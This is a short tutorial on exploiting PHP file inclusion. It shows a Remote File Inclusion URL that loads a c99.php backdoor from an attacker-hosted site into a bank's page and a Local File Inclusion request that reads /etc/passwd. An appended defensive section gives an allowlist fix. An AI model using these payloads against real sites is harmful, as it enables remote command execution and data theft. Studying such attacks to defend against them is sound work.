How to exploit File Inclusion vulnerability

File inclusion is also a dangerous vulnerability. It can appear in any server-side scripting language, but most of the time it appears in PHP scripts because of careless use of functions such as include, require_once, etc.

There are two types of file inclusion vulnerability: Remote File Inclusion and Local File Inclusion.

Remote File Inclusion Vulnerability:

Perhaps you have heard about RFI (Remote File Inclusion), which is really dangerous. If an RFI vulnerability exists, an attacker (hacker) may load malicious scripts (just think about IFRAME).

Suppose my target is:

www.bank.com/index.php?fool=developer

So somewhere in the "*.php" file there is some code like:

$fool = $_GET['fool'];
include( $fool . '.php' );

So include will actually load developer.php. But because we are hackers, we can browse the site in another, malicious way. Suppose we hosted a c99.php backdoor on our own website (www.mysite.com/c99.php). Now it is time to exploit it like this:

www.bank.com/index.php?fool=http://www.mysite.com/c99.php

If the target website loads this page, then we can run commands, upload files, etc.

Local File Inclusion:

LFI (Local File Inclusion) is the same as RFI, but it loads a local file from the target server.

For example:

www.bank.com/lfi.php?include=/etc/passwd

But my favorite Linux does not allow you to write files or read the /etc/shadow file unless you have sudo/su power. Of course we can still read other files, such as mysql, error_file, write some temp files, etc.

Easy to understand?
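
From the defender's side, both the RFI and the LFI request above fail once the "fool" parameter is matched against a fixed list of page names instead of being passed to include. The following is an added example, not code from the original post; the function name resolve_page, the page list and the temporary pages directory are assumptions made for the demonstration.

```php
<?php
// Added example: allowlist-based replacement for include($fool . '.php').
// ALLOWED_PAGES and the demo directory are assumptions, not from the post.
const ALLOWED_PAGES = ['home', 'developer', 'contact'];

/**
 * Map the user-supplied "fool" value to a file that is safe to include.
 * Returns the absolute path, or null when the request must be rejected.
 */
function resolve_page(string $requested, string $pageDir): ?string
{
    // 1. Exact, type-strict allowlist match. Anything not listed is
    //    rejected, whether it is a URL, an absolute path or a relative path.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: the resolved file must exist and must still
    //    live under the pages directory after symlinks are resolved.
    $base = realpath($pageDir);
    $path = realpath($pageDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo setup: a throwaway pages directory with one page in it.
$dir = sys_get_temp_dir() . '/fi_demo_pages';
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . '/developer.php', "<?php echo 'developer page';\n");

// Constructed inputs: the legitimate value and the two request values
// shown in the post.
$samples = ['developer', 'http://www.mysite.com/c99.php', '/etc/passwd'];
foreach ($samples as $value) {
    $path = resolve_page($value, $dir);
    printf("%-32s => %s\n", $value, $path === null ? 'REJECTED' : 'include ' . $path);
}
```

Separately from the code, leaving PHP's allow_url_include setting at its default of Off stops include from fetching http:// URLs at all, which removes the remote case even where a script like the one above has not been fixed yet.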